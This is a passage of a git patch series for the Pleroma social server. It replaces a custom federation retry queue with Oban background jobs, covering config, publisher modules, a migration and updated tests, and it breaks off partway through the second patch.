From 23d279e03ee1f7a1285614754738711359bc4b81 Mon Sep 17 00:00:00 2001
From: Ivan Tashkinov
Date: Thu, 1 Aug 2019 17:28:00 +0300
Subject: [PATCH 001/272] [#1149] Replaced RetryQueue with oban-based retries.
---
config/config.exs | 17 +-
config/test.exs | 4 +
docs/config.md | 7 -
lib/pleroma/application.ex | 4 +-
lib/pleroma/web/activity_pub/publisher.ex | 16 +-
lib/pleroma/web/federator/federator.ex | 14 -
lib/pleroma/web/federator/publisher.ex | 22 +-
lib/pleroma/web/federator/retry_queue.ex | 239 ------------------
lib/pleroma/web/salmon/salmon.ex | 11 +-
lib/pleroma/workers/publisher.ex | 14 +
mix.exs | 1 +
mix.lock | 1 +
.../20190730055101_add_oban_jobs_table.exs | 6 +
test/user_test.exs | 15 +-
test/web/activity_pub/publisher_test.exs | 2 +-
test/web/federator_test.exs | 78 +++---
test/web/retry_queue_test.exs | 48 ----
test/web/salmon/salmon_test.exs | 2 +-
18 files changed, 106 insertions(+), 395 deletions(-)
delete mode 100644 lib/pleroma/web/federator/retry_queue.ex
create mode 100644 lib/pleroma/workers/publisher.ex
create mode 100644 priv/repo/migrations/20190730055101_add_oban_jobs_table.exs
delete mode 100644 test/web/retry_queue_test.exs
diff --git a/config/config.exs b/config/config.exs
index 17770640a..1bb325bf5 100644
--- a/config/config.exs
+++ b/config/config.exs
@@ -440,13 +440,7 @@
"web"
]
-config :pleroma, Pleroma.Web.Federator.RetryQueue,
- enabled: false,
- max_jobs: 20,
- initial_timeout: 30,
- max_retries: 5
-
-config :pleroma_job_queue, :queues,
+job_queues = [
federator_incoming: 50,
federator_outgoing: 50,
web_push: 50,
@@ -454,6 +448,15 @@
transmogrifier: 20,
scheduled_activities: 10,
background: 5
+]
+
+config :pleroma_job_queue, :queues, job_queues
+
+config :pleroma, Oban,
+ repo: Pleroma.Repo,
+ verbose: false,
+ prune: {:maxage, 60 * 60 * 24 * 7},
+ queues: job_queues
config :pleroma, :fetch_initial_posts,
enabled: false,
diff --git a/config/test.exs b/config/test.exs
index 92dca18bc..23d9bf779 100644
--- a/config/test.exs
+++ b/config/test.exs
@@ -62,6 +62,10 @@
config :pleroma_job_queue, disabled: true
+config :pleroma, Oban,
+ queues: false,
+ prune: :disabled
+
config :pleroma, Pleroma.ScheduledActivity,
daily_user_limit: 2,
total_user_limit: 3,
diff --git a/docs/config.md b/docs/config.md
index 02f86dc16..5c18ffdbf 100644
--- a/docs/config.md
+++ b/docs/config.md
@@ -412,13 +412,6 @@ config :pleroma_job_queue, :queues,
This config contains two queues: `federator_incoming` and `federator_outgoing`. Both have the `max_jobs` set to `50`.
-## Pleroma.Web.Federator.RetryQueue
-
-* `enabled`: If set to `true`, failed federation jobs will be retried
-* `max_jobs`: The maximum amount of parallel federation jobs running at the same time.
-* `initial_timeout`: The initial timeout in seconds
-* `max_retries`: The maximum number of times a federation job is retried
-
## Pleroma.Web.Metadata
* `providers`: a list of metadata providers to enable. Providers available:
* Pleroma.Web.Metadata.Providers.OpenGraph
diff --git a/lib/pleroma/application.ex b/lib/pleroma/application.ex
index 035331491..ce7d8c4b2 100644
--- a/lib/pleroma/application.ex
+++ b/lib/pleroma/application.ex
@@ -120,8 +120,8 @@ def start(_type, _args) do
hackney_pool_children() ++
[
%{
- id: Pleroma.Web.Federator.RetryQueue,
- start: {Pleroma.Web.Federator.RetryQueue, :start_link, []}
+ id: Oban,
+ start: {Oban, :start_link, [Application.get_env(:pleroma, Oban)]}
},
%{
id: Pleroma.Web.OAuth.Token.CleanWorker,
diff --git a/lib/pleroma/web/activity_pub/publisher.ex b/lib/pleroma/web/activity_pub/publisher.ex
index 46edab0bd..29f3221d1 100644
--- a/lib/pleroma/web/activity_pub/publisher.ex
+++ b/lib/pleroma/web/activity_pub/publisher.ex
@@ -85,6 +85,15 @@ def publish_one(%{inbox: inbox, json: json, actor: %User{} = actor, id: id} = pa
end
end
+ def publish_one(%{actor_id: actor_id} = params) do
+ actor = User.get_by_id(actor_id)
+
+ params
+ |> Map.delete(:actor_id)
+ |> Map.put(:actor, actor)
+ |> publish_one()
+ end
+
defp should_federate?(inbox, public) do
if public do
true
@@ -160,7 +169,8 @@ def determine_inbox(
Publishes an activity with BCC to all relevant peers.
"""
- def publish(actor, %{data: %{"bcc" => bcc}} = activity) when is_list(bcc) and bcc != [] do
+ def publish(%User{} = actor, %{data: %{"bcc" => bcc}} = activity)
+ when is_list(bcc) and bcc != [] do
public = is_public?(activity)
{:ok, data} = Transmogrifier.prepare_outgoing(activity.data)
@@ -187,7 +197,7 @@ def publish(actor, %{data: %{"bcc" => bcc}} = activity) when is_list(bcc) and bc
Pleroma.Web.Federator.Publisher.enqueue_one(__MODULE__, %{
inbox: inbox,
json: json,
- actor: actor,
+ actor_id: actor.id,
id: activity.data["id"],
unreachable_since: unreachable_since
})
@@ -222,7 +232,7 @@ def publish(%User{} = actor, %Activity{} = activity) do
%{
inbox: inbox,
json: json,
- actor: actor,
+ actor_id: actor.id,
id: activity.data["id"],
unreachable_since: unreachable_since
}
diff --git a/lib/pleroma/web/federator/federator.ex b/lib/pleroma/web/federator/federator.ex
index f4f9e83e0..97ec9d549 100644
--- a/lib/pleroma/web/federator/federator.ex
+++ b/lib/pleroma/web/federator/federator.ex
@@ -10,7 +10,6 @@ defmodule Pleroma.Web.Federator do
alias Pleroma.Web.ActivityPub.Transmogrifier
alias Pleroma.Web.ActivityPub.Utils
alias Pleroma.Web.Federator.Publisher
- alias Pleroma.Web.Federator.RetryQueue
alias Pleroma.Web.OStatus
alias Pleroma.Web.Websub
@@ -130,19 +129,6 @@ def perform(:incoming_ap_doc, params) do
end
end
- def perform(
- :publish_single_websub,
- %{xml: _xml, topic: _topic, callback: _callback, secret: _secret} = params
- ) do
- case Websub.publish_one(params) do
- {:ok, _} ->
- :ok
-
- {:error, _} ->
- RetryQueue.enqueue(params, Websub)
- end
- end
-
def perform(type, _) do
Logger.debug(fn -> "Unknown task: #{type}" end)
{:error, "Don't know what to do with this"}
diff --git a/lib/pleroma/web/federator/publisher.ex b/lib/pleroma/web/federator/publisher.ex
index 70f870244..e8c1bf17f 100644
--- a/lib/pleroma/web/federator/publisher.ex
+++ b/lib/pleroma/web/federator/publisher.ex
@@ -6,7 +6,6 @@ defmodule Pleroma.Web.Federator.Publisher do
alias Pleroma.Activity
alias Pleroma.Config
alias Pleroma.User
- alias Pleroma.Web.Federator.RetryQueue
require Logger
@@ -30,23 +29,10 @@ defmodule Pleroma.Web.Federator.Publisher do
Enqueue publishing a single activity.
"""
@spec enqueue_one(module(), Map.t()) :: :ok
- def enqueue_one(module, %{} = params),
- do: PleromaJobQueue.enqueue(:federator_outgoing, __MODULE__, [:publish_one, module, params])
-
- @spec perform(atom(), module(), any()) :: {:ok, any()} | {:error, any()}
- def perform(:publish_one, module, params) do
- case apply(module, :publish_one, [params]) do
- {:ok, _} ->
- :ok
-
- {:error, _e} ->
- RetryQueue.enqueue(params, module)
- end
- end
-
- def perform(type, _, _) do
- Logger.debug("Unknown task: #{type}")
- {:error, "Don't know what to do with this"}
+ def enqueue_one(module, %{} = params) do
+ %{module: to_string(module), params: params}
+ |> Pleroma.Workers.Publisher.new()
+ |> Pleroma.Repo.insert()
end
@doc """
diff --git a/lib/pleroma/web/federator/retry_queue.ex b/lib/pleroma/web/federator/retry_queue.ex
deleted file mode 100644
index 3db948c2e..000000000
--- a/lib/pleroma/web/federator/retry_queue.ex
+++ /dev/null
@@ -1,239 +0,0 @@
-# Pleroma: A lightweight social networking server
-# Copyright © 2017-2019 Pleroma Authors
-# SPDX-License-Identifier: AGPL-3.0-only
-
-defmodule Pleroma.Web.Federator.RetryQueue do
- use GenServer
-
- require Logger
-
- def init(args) do
- queue_table = :ets.new(:pleroma_retry_queue, [:bag, :protected])
-
- {:ok, %{args | queue_table: queue_table, running_jobs: :sets.new()}}
- end
-
- def start_link do
- enabled =
- if Pleroma.Config.get(:env) == :test,
- do: true,
- else: Pleroma.Config.get([__MODULE__, :enabled], false)
-
- if enabled do
- Logger.info("Starting retry queue")
-
- linkres =
- GenServer.start_link(
- __MODULE__,
- %{delivered: 0, dropped: 0, queue_table: nil, running_jobs: nil},
- name: __MODULE__
- )
-
- maybe_kickoff_timer()
- linkres
- else
- Logger.info("Retry queue disabled")
- :ignore
- end
- end
-
- def enqueue(data, transport, retries \\ 0) do
- GenServer.cast(__MODULE__, {:maybe_enqueue, data, transport, retries + 1})
- end
-
- def get_stats do
- GenServer.call(__MODULE__, :get_stats)
- end
-
- def reset_stats do
- GenServer.call(__MODULE__, :reset_stats)
- end
-
- def get_retry_params(retries) do
- if retries > Pleroma.Config.get([__MODULE__, :max_retries]) do
- {:drop, "Max retries reached"}
- else
- {:retry, growth_function(retries)}
- end
- end
-
- def get_retry_timer_interval do
- Pleroma.Config.get([:retry_queue, :interval], 1000)
- end
-
- defp ets_count_expires(table, current_time) do
- :ets.select_count(
- table,
- [
- {
- {:"$1", :"$2"},
- [{:"=<", :"$1", {:const, current_time}}],
- [true]
- }
- ]
- )
- end
-
- defp ets_pop_n_expired(table, current_time, desired) do
- {popped, _continuation} =
- :ets.select(
- table,
- [
- {
- {:"$1", :"$2"},
- [{:"=<", :"$1", {:const, current_time}}],
- [:"$_"]
- }
- ],
- desired
- )
-
- popped
- |> Enum.each(fn e ->
- :ets.delete_object(table, e)
- end)
-
- popped
- end
-
- def maybe_start_job(running_jobs, queue_table) do
- # we don't want to hit the ets or the DateTime more times than we have to
- # could optimize slightly further by not using the count, and instead grabbing
- # up to N objects early...
- current_time = DateTime.to_unix(DateTime.utc_now())
- n_running_jobs = :sets.size(running_jobs)
-
- if n_running_jobs < Pleroma.Config.get([__MODULE__, :max_jobs]) do
- n_ready_jobs = ets_count_expires(queue_table, current_time)
-
- if n_ready_jobs > 0 do
- # figure out how many we could start
- available_job_slots = Pleroma.Config.get([__MODULE__, :max_jobs]) - n_running_jobs
- start_n_jobs(running_jobs, queue_table, current_time, available_job_slots)
- else
- running_jobs
- end
- else
- running_jobs
- end
- end
-
- defp start_n_jobs(running_jobs, _queue_table, _current_time, 0) do
- running_jobs
- end
-
- defp start_n_jobs(running_jobs, queue_table, current_time, available_job_slots)
- when available_job_slots > 0 do
- candidates = ets_pop_n_expired(queue_table, current_time, available_job_slots)
-
- candidates
- |> List.foldl(running_jobs, fn {_, e}, rj ->
- {:ok, pid} = Task.start(fn -> worker(e) end)
- mref = Process.monitor(pid)
- :sets.add_element(mref, rj)
- end)
- end
-
- def worker({:send, data, transport, retries}) do
- case transport.publish_one(data) do
- {:ok, _} ->
- GenServer.cast(__MODULE__, :inc_delivered)
- :delivered
-
- {:error, _reason} ->
- enqueue(data, transport, retries)
- :retry
- end
- end
-
- def handle_call(:get_stats, _from, %{delivered: delivery_count, dropped: drop_count} = state) do
- {:reply, %{delivered: delivery_count, dropped: drop_count}, state}
- end
-
- def handle_call(:reset_stats, _from, %{delivered: delivery_count, dropped: drop_count} = state) do
- {:reply, %{delivered: delivery_count, dropped: drop_count},
- %{state | delivered: 0, dropped: 0}}
- end
-
- def handle_cast(:reset_stats, state) do
- {:noreply, %{state | delivered: 0, dropped: 0}}
- end
-
- def handle_cast(
- {:maybe_enqueue, data, transport, retries},
- %{dropped: drop_count, queue_table: queue_table, running_jobs: running_jobs} = state
- ) do
- case get_retry_params(retries) do
- {:retry, timeout} ->
- :ets.insert(queue_table, {timeout, {:send, data, transport, retries}})
- running_jobs = maybe_start_job(running_jobs, queue_table)
- {:noreply, %{state | running_jobs: running_jobs}}
-
- {:drop, message} ->
- Logger.debug(message)
- {:noreply, %{state | dropped: drop_count + 1}}
- end
- end
-
- def handle_cast(:kickoff_timer, state) do
- retry_interval = get_retry_timer_interval()
- Process.send_after(__MODULE__, :retry_timer_run, retry_interval)
- {:noreply, state}
- end
-
- def handle_cast(:inc_delivered, %{delivered: delivery_count} = state) do
- {:noreply, %{state | delivered: delivery_count + 1}}
- end
-
- def handle_cast(:inc_dropped, %{dropped: drop_count} = state) do
- {:noreply, %{state | dropped: drop_count + 1}}
- end
-
- def handle_info({:send, data, transport, retries}, %{delivered: delivery_count} = state) do
- case transport.publish_one(data) do
- {:ok, _} ->
- {:noreply, %{state | delivered: delivery_count + 1}}
-
- {:error, _reason} ->
- enqueue(data, transport, retries)
- {:noreply, state}
- end
- end
-
- def handle_info(
- :retry_timer_run,
- %{queue_table: queue_table, running_jobs: running_jobs} = state
- ) do
- maybe_kickoff_timer()
- running_jobs = maybe_start_job(running_jobs, queue_table)
- {:noreply, %{state | running_jobs: running_jobs}}
- end
-
- def handle_info({:DOWN, ref, :process, _pid, _reason}, state) do
- %{running_jobs: running_jobs, queue_table: queue_table} = state
- running_jobs = :sets.del_element(ref, running_jobs)
- running_jobs = maybe_start_job(running_jobs, queue_table)
- {:noreply, %{state | running_jobs: running_jobs}}
- end
-
- def handle_info(unknown, state) do
- Logger.debug("RetryQueue: don't know what to do with #{inspect(unknown)}, ignoring")
- {:noreply, state}
- end
-
- if Pleroma.Config.get(:env) == :test do
- defp growth_function(_retries) do
- _shutit = Pleroma.Config.get([__MODULE__, :initial_timeout])
- DateTime.to_unix(DateTime.utc_now()) - 1
- end
- else
- defp growth_function(retries) do
- round(Pleroma.Config.get([__MODULE__, :initial_timeout]) * :math.pow(retries, 3)) +
- DateTime.to_unix(DateTime.utc_now())
- end
- end
-
- defp maybe_kickoff_timer do
- GenServer.cast(__MODULE__, :kickoff_timer)
- end
-end
diff --git a/lib/pleroma/web/salmon/salmon.ex b/lib/pleroma/web/salmon/salmon.ex
index 9b01ebcc6..bbaa293fd 100644
--- a/lib/pleroma/web/salmon/salmon.ex
+++ b/lib/pleroma/web/salmon/salmon.ex
@@ -170,6 +170,15 @@ def publish_one(%{recipient: url, feed: feed} = params) when is_binary(url) do
end
end
+ def publish_one(%{recipient_id: recipient_id} = params) do
+ recipient = User.get_by_id(recipient_id)
+
+ params
+ |> Map.delete(:recipient_id)
+ |> Map.put(:recipient, recipient)
+ |> publish_one()
+ end
+
def publish_one(_), do: :noop
@supported_activities [
@@ -218,7 +227,7 @@ def publish(%{info: %{keys: keys}} = user, %{data: %{"type" => type}} = activity
Logger.debug(fn -> "Sending Salmon to #{remote_user.ap_id}" end)
Publisher.enqueue_one(__MODULE__, %{
- recipient: remote_user,
+ recipient_id: remote_user.id,
feed: feed,
unreachable_since: reachable_urls_metadata[remote_user.info.salmon]
})
diff --git a/lib/pleroma/workers/publisher.ex b/lib/pleroma/workers/publisher.ex
new file mode 100644
index 000000000..639794830
--- /dev/null
+++ b/lib/pleroma/workers/publisher.ex
@@ -0,0 +1,14 @@
+# Pleroma: A lightweight social networking server
+# Copyright © 2017-2019 Pleroma Authors
+# SPDX-License-Identifier: AGPL-3.0-only
+
+defmodule Pleroma.Workers.Publisher do
+ use Oban.Worker, queue: "federator_outgoing", max_attempts: 5
+
+ @impl Oban.Worker
+ def perform(%Oban.Job{args: %{module: module_name, params: params}}) do
+ module_name
+ |> String.to_atom()
+ |> apply(:publish_one, [params])
+ end
+end
diff --git a/mix.exs b/mix.exs
index 2a8fe2e9d..1ca7a4a77 100644
--- a/mix.exs
+++ b/mix.exs
@@ -101,6 +101,7 @@ defp deps do
{:phoenix_ecto, "~> 4.0"},
{:ecto_sql, "~> 3.1"},
{:postgrex, ">= 0.13.5"},
+ {:oban, "~> 0.6"},
{:gettext, "~> 0.15"},
{:comeonin, "~> 4.1.1"},
{:pbkdf2_elixir, "~> 0.12.3"},
diff --git a/mix.lock b/mix.lock
index 65da7be8b..8c0b9734e 100644
--- a/mix.lock
+++ b/mix.lock
@@ -55,6 +55,7 @@
"mogrify": {:hex, :mogrify, "0.6.1", "de1b527514f2d95a7bbe9642eb556061afb337e220cf97adbf3a4e6438ed70af", [:mix], [], "hexpm"},
"mox": {:hex, :mox, "0.5.1", "f86bb36026aac1e6f924a4b6d024b05e9adbed5c63e8daa069bd66fb3292165b", [:mix], [], "hexpm"},
"nimble_parsec": {:hex, :nimble_parsec, "0.5.0", "90e2eca3d0266e5c53f8fbe0079694740b9c91b6747f2b7e3c5d21966bba8300", [:mix], [], "hexpm"},
+ "oban": {:hex, :oban, "0.6.0", "8b9b861355610e703e58a878bc29959f3f0e1b4cd1e90d785cf2bb2498d3b893", [:mix], [{:ecto_sql, "~> 3.1", [hex: :ecto_sql, repo: "hexpm", optional: false]}, {:jason, "~> 1.1", [hex: :jason, repo: "hexpm", optional: false]}, {:postgrex, "~> 0.14", [hex: :postgrex, repo: "hexpm", optional: false]}, {:telemetry, "~> 0.4", [hex: :telemetry, repo: "hexpm", optional: false]}], "hexpm"},
"parse_trans": {:hex, :parse_trans, "3.3.0", "09765507a3c7590a784615cfd421d101aec25098d50b89d7aa1d66646bc571c1", [:rebar3], [], "hexpm"},
"pbkdf2_elixir": {:hex, :pbkdf2_elixir, "0.12.3", "6706a148809a29c306062862c803406e88f048277f6e85b68faf73291e820b84", [:mix], [], "hexpm"},
"phoenix": {:hex, :phoenix, "1.4.9", "746d098e10741c334d88143d3c94cab1756435f94387a63441792e66ec0ee974", [:mix], [{:jason, "~> 1.0", [hex: :jason, repo: "hexpm", optional: true]}, {:phoenix_pubsub, "~> 1.1", [hex: :phoenix_pubsub, repo: "hexpm", optional: false]}, {:plug, "~> 1.8.1 or ~> 1.9", [hex: :plug, repo: "hexpm", optional: false]}, {:plug_cowboy, "~> 1.0 or ~> 2.0", [hex: :plug_cowboy, repo: "hexpm", optional: true]}, {:telemetry, "~> 0.4", [hex: :telemetry, repo: "hexpm", optional: false]}], "hexpm"},
diff --git a/priv/repo/migrations/20190730055101_add_oban_jobs_table.exs b/priv/repo/migrations/20190730055101_add_oban_jobs_table.exs
new file mode 100644
index 000000000..2f201bd05
--- /dev/null
+++ b/priv/repo/migrations/20190730055101_add_oban_jobs_table.exs
@@ -0,0 +1,6 @@
+defmodule Pleroma.Repo.Migrations.AddObanJobsTable do
+ use Ecto.Migration
+
+ defdelegate up, to: Oban.Migrations
+ defdelegate down, to: Oban.Migrations
+end
diff --git a/test/user_test.exs b/test/user_test.exs
index 556df45fd..70c376384 100644
--- a/test/user_test.exs
+++ b/test/user_test.exs
@@ -12,9 +12,9 @@ defmodule Pleroma.UserTest do
alias Pleroma.Web.CommonAPI
use Pleroma.DataCase
+ use Oban.Testing, repo: Pleroma.Repo
import Pleroma.Factory
- import Mock
setup_all do
Tesla.Mock.mock_global(fn env -> apply(HttpRequestMock, :request, [env]) end)
@@ -1034,11 +1034,7 @@ test "it deletes a user, all follow relationships and all activities", %{user: u
refute Activity.get_by_id(repeat.id)
end
- test_with_mock "it sends out User Delete activity",
- %{user: user},
- Pleroma.Web.ActivityPub.Publisher,
- [:passthrough],
- [] do
+ test "it sends out User Delete activity", %{user: user} do
config_path = [:instance, :federating]
initial_setting = Pleroma.Config.get(config_path)
Pleroma.Config.put(config_path, true)
@@ -1048,11 +1044,8 @@ test "it deletes a user, all follow relationships and all activities", %{user: u
{:ok, _user} = User.delete(user)
- assert called(
- Pleroma.Web.ActivityPub.Publisher.publish_one(%{
- inbox: "http://mastodon.example.org/inbox"
- })
- )
+ assert [%{args: %{"params" => %{"inbox" => "http://mastodon.example.org/inbox"}}}] =
+ all_enqueued(worker: Pleroma.Workers.Publisher)
Pleroma.Config.put(config_path, initial_setting)
end
diff --git a/test/web/activity_pub/publisher_test.exs b/test/web/activity_pub/publisher_test.exs
index 36a39c84c..26d019878 100644
--- a/test/web/activity_pub/publisher_test.exs
+++ b/test/web/activity_pub/publisher_test.exs
@@ -257,7 +257,7 @@ test "it returns inbox for messages involving single recipients in total" do
assert called(
Pleroma.Web.Federator.Publisher.enqueue_one(Publisher, %{
inbox: "https://domain.com/users/nick1/inbox",
- actor: actor,
+ actor_id: actor.id,
id: note_activity.data["id"]
})
)
diff --git a/test/web/federator_test.exs b/test/web/federator_test.exs
index 6e143eee4..5c1704548 100644
--- a/test/web/federator_test.exs
+++ b/test/web/federator_test.exs
@@ -6,7 +6,10 @@ defmodule Pleroma.Web.FederatorTest do
alias Pleroma.Instances
alias Pleroma.Web.CommonAPI
alias Pleroma.Web.Federator
+
use Pleroma.DataCase
+ use Oban.Testing, repo: Pleroma.Repo
+
import Pleroma.Factory
import Mock
@@ -22,15 +25,6 @@ defmodule Pleroma.Web.FederatorTest do
:ok
end
- describe "Publisher.perform" do
- test "call `perform` with unknown task" do
- assert {
- :error,
- "Don't know what to do with this"
- } = Pleroma.Web.Federator.Publisher.perform("test", :ok, :ok)
- end
- end
-
describe "Publish an activity" do
setup do
user = insert(:user)
@@ -73,10 +67,7 @@ test "with relays deactivated, it does not publish to the relay", %{
end
describe "Targets reachability filtering in `publish`" do
- test_with_mock "it federates only to reachable instances via AP",
- Pleroma.Web.ActivityPub.Publisher,
- [:passthrough],
- [] do
+ test "it federates only to reachable instances via AP" do
user = insert(:user)
{inbox1, inbox2} =
@@ -104,20 +95,13 @@ test "with relays deactivated, it does not publish to the relay", %{
{:ok, _activity} =
CommonAPI.post(user, %{"status" => "HI @nick1@domain.com, @nick2@domain2.com!"})
- assert called(
- Pleroma.Web.ActivityPub.Publisher.publish_one(%{
- inbox: inbox1,
- unreachable_since: dt
- })
- )
+ expected_dt = NaiveDateTime.to_iso8601(dt)
- refute called(Pleroma.Web.ActivityPub.Publisher.publish_one(%{inbox: inbox2}))
+ assert [%{args: %{"params" => %{"inbox" => ^inbox1, "unreachable_since" => ^expected_dt}}}] =
+ all_enqueued(worker: Pleroma.Workers.Publisher)
end
- test_with_mock "it federates only to reachable instances via Websub",
- Pleroma.Web.Websub,
- [:passthrough],
- [] do
+ test "it federates only to reachable instances via Websub" do
user = insert(:user)
websub_topic = Pleroma.Web.OStatus.feed_path(user)
@@ -142,23 +126,25 @@ test "with relays deactivated, it does not publish to the relay", %{
{:ok, _activity} = CommonAPI.post(user, %{"status" => "HI"})
- assert called(
- Pleroma.Web.Websub.publish_one(%{
- callback: sub2.callback,
- unreachable_since: dt
- })
- )
+ expected_callback = sub2.callback
+ expected_dt = NaiveDateTime.to_iso8601(dt)
- refute called(Pleroma.Web.Websub.publish_one(%{callback: sub1.callback}))
+ assert [
+ %{
+ args: %{
+ "params" => %{
+ "callback" => ^expected_callback,
+ "unreachable_since" => ^expected_dt
+ }
+ }
+ }
+ ] = all_enqueued(worker: Pleroma.Workers.Publisher)
end
- test_with_mock "it federates only to reachable instances via Salmon",
- Pleroma.Web.Salmon,
- [:passthrough],
- [] do
+ test "it federates only to reachable instances via Salmon" do
user = insert(:user)
- remote_user1 =
+ _remote_user1 =
insert(:user, %{
local: false,
nickname: "nick1@domain.com",
@@ -174,6 +160,8 @@ test "with relays deactivated, it does not publish to the relay", %{
info: %{salmon: "https://domain2.com/salmon"}
})
+ remote_user2_id = remote_user2.id
+
dt = NaiveDateTime.utc_now()
Instances.set_unreachable(remote_user2.ap_id, dt)
@@ -182,14 +170,18 @@ test "with relays deactivated, it does not publish to the relay", %{
{:ok, _activity} =
CommonAPI.post(user, %{"status" => "HI @nick1@domain.com, @nick2@domain2.com!"})
- assert called(
- Pleroma.Web.Salmon.publish_one(%{
- recipient: remote_user2,
- unreachable_since: dt
- })
- )
+ expected_dt = NaiveDateTime.to_iso8601(dt)
- refute called(Pleroma.Web.Salmon.publish_one(%{recipient: remote_user1}))
+ assert [
+ %{
+ args: %{
+ "params" => %{
+ "recipient_id" => ^remote_user2_id,
+ "unreachable_since" => ^expected_dt
+ }
+ }
+ }
+ ] = all_enqueued(worker: Pleroma.Workers.Publisher)
end
end
diff --git a/test/web/retry_queue_test.exs b/test/web/retry_queue_test.exs
deleted file mode 100644
index ecb3ce5d0..000000000
--- a/test/web/retry_queue_test.exs
+++ /dev/null
@@ -1,48 +0,0 @@
-# Pleroma: A lightweight social networking server
-# Copyright © 2017-2018 Pleroma Authors
-# SPDX-License-Identifier: AGPL-3.0-only
-
-defmodule MockActivityPub do
- def publish_one({ret, waiter}) do
- send(waiter, :complete)
- {ret, "success"}
- end
-end
-
-defmodule Pleroma.Web.Federator.RetryQueueTest do
- use Pleroma.DataCase
- alias Pleroma.Web.Federator.RetryQueue
-
- @small_retry_count 0
- @hopeless_retry_count 10
-
- setup do
- RetryQueue.reset_stats()
- end
-
- test "RetryQueue responds to stats request" do
- assert %{delivered: 0, dropped: 0} == RetryQueue.get_stats()
- end
-
- test "failed posts are retried" do
- {:retry, _timeout} = RetryQueue.get_retry_params(@small_retry_count)
-
- wait_task =
- Task.async(fn ->
- receive do
- :complete -> :ok
- end
- end)
-
- RetryQueue.enqueue({:ok, wait_task.pid}, MockActivityPub, @small_retry_count)
- Task.await(wait_task)
- assert %{delivered: 1, dropped: 0} == RetryQueue.get_stats()
- end
-
- test "posts that have been tried too many times are dropped" do
- {:drop, _timeout} = RetryQueue.get_retry_params(@hopeless_retry_count)
-
- RetryQueue.enqueue({:ok, nil}, MockActivityPub, @hopeless_retry_count)
- assert %{delivered: 0, dropped: 1} == RetryQueue.get_stats()
- end
-end
diff --git a/test/web/salmon/salmon_test.exs b/test/web/salmon/salmon_test.exs
index e86e76fe9..0186f3fef 100644
--- a/test/web/salmon/salmon_test.exs
+++ b/test/web/salmon/salmon_test.exs
@@ -96,6 +96,6 @@ test "it gets a magic key" do
Salmon.publish(user, activity)
- assert called(Publisher.enqueue_one(Salmon, %{recipient: mentioned_user}))
+ assert called(Publisher.enqueue_one(Salmon, %{recipient_id: mentioned_user.id}))
end
end
From b7fad8d395c2bd1afe445a370e539571f5ec0c18 Mon Sep 17 00:00:00 2001
From: Ivan Tashkinov
Date: Fri, 9 Aug 2019 20:08:01 +0300
Subject: [PATCH 002/272] [#1149] Oban jobs implementation for
:federator_incoming and :federator_outgoing queues.
---
config/config.exs | 7 +
lib/pleroma/web/activity_pub/utils.ex | 9 +-
lib/pleroma/web/federator/federator.ex | 134 +++++-------------
lib/pleroma/web/federator/publisher.ex | 12 +-
lib/pleroma/workers/publisher.ex | 25 +++-
lib/pleroma/workers/receiver.ex | 61 ++++++++
lib/pleroma/workers/subscriber.ex | 44 ++++++
test/activity_test.exs | 4 +-
test/support/oban_helpers.ex | 36 +++++
test/user_test.exs | 11 +-
.../activity_pub_controller_test.exs | 14 +-
test/web/federator_test.exs | 57 +++++---
test/web/websub/websub_test.exs | 4 +
13 files changed, 280 insertions(+), 138 deletions(-)
create mode 100644 lib/pleroma/workers/receiver.ex
create mode 100644 lib/pleroma/workers/subscriber.ex
create mode 100644 test/support/oban_helpers.ex
diff --git a/config/config.exs b/config/config.exs
index 1bb325bf5..5fd64365c 100644
--- a/config/config.exs
+++ b/config/config.exs
@@ -458,6 +458,13 @@
prune: {:maxage, 60 * 60 * 24 * 7},
queues: job_queues
+config :pleroma, :workers,
+ retries: [
+ compile_time_default: 1,
+ federator_incoming: 5,
+ federator_outgoing: 5
+ ]
+
config :pleroma, :fetch_initial_posts,
enabled: false,
pages: 5
diff --git a/lib/pleroma/web/activity_pub/utils.ex b/lib/pleroma/web/activity_pub/utils.ex
index 39074888b..f0917f9d4 100644
--- a/lib/pleroma/web/activity_pub/utils.ex
+++ b/lib/pleroma/web/activity_pub/utils.ex
@@ -168,14 +168,7 @@ def create_context(context) do
"""
def maybe_federate(%Activity{local: true} = activity) do
if Pleroma.Config.get!([:instance, :federating]) do
- priority =
- case activity.data["type"] do
- "Delete" -> 10
- "Create" -> 1
- _ -> 5
- end
-
- Pleroma.Web.Federator.publish(activity, priority)
+ Pleroma.Web.Federator.publish(activity)
end
:ok
diff --git a/lib/pleroma/web/federator/federator.ex b/lib/pleroma/web/federator/federator.ex
index 97ec9d549..bb9eadfee 100644
--- a/lib/pleroma/web/federator/federator.ex
+++ b/lib/pleroma/web/federator/federator.ex
@@ -3,22 +3,15 @@
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Web.Federator do
- alias Pleroma.Activity
- alias Pleroma.Object.Containment
- alias Pleroma.User
- alias Pleroma.Web.ActivityPub.ActivityPub
- alias Pleroma.Web.ActivityPub.Transmogrifier
- alias Pleroma.Web.ActivityPub.Utils
- alias Pleroma.Web.Federator.Publisher
- alias Pleroma.Web.OStatus
- alias Pleroma.Web.Websub
+ alias Pleroma.Workers.Publisher, as: PublisherWorker
+ alias Pleroma.Workers.Receiver, as: ReceiverWorker
+ alias Pleroma.Workers.Subscriber, as: SubscriberWorker
require Logger
def init do
# 1 minute
- Process.sleep(1000 * 60)
- refresh_subscriptions()
+ refresh_subscriptions(schedule_in: 60)
end
@doc "Addresses [memory leaks on recursive replies fetching](https://git.pleroma.social/pleroma/pleroma/issues/161)"
@@ -36,111 +29,50 @@ def allowed_incoming_reply_depth?(depth) do
# Client API
def incoming_doc(doc) do
- PleromaJobQueue.enqueue(:federator_incoming, __MODULE__, [:incoming_doc, doc])
+ %{"op" => "incoming_doc", "body" => doc}
+ |> ReceiverWorker.new(worker_args(:federator_incoming))
+ |> Pleroma.Repo.insert()
end
def incoming_ap_doc(params) do
- PleromaJobQueue.enqueue(:federator_incoming, __MODULE__, [:incoming_ap_doc, params])
+ %{"op" => "incoming_ap_doc", "params" => params}
+ |> ReceiverWorker.new(worker_args(:federator_incoming))
+ |> Pleroma.Repo.insert()
end
- def publish(activity, priority \\ 1) do
- PleromaJobQueue.enqueue(:federator_outgoing, __MODULE__, [:publish, activity], priority)
+ def publish(%{id: "pleroma:fakeid"} = activity) do
+ PublisherWorker.perform_publish(activity)
+ end
+
+ def publish(activity) do
+ %{"op" => "publish", "activity_id" => activity.id}
+ |> PublisherWorker.new(worker_args(:federator_outgoing))
+ |> Pleroma.Repo.insert()
end
def verify_websub(websub) do
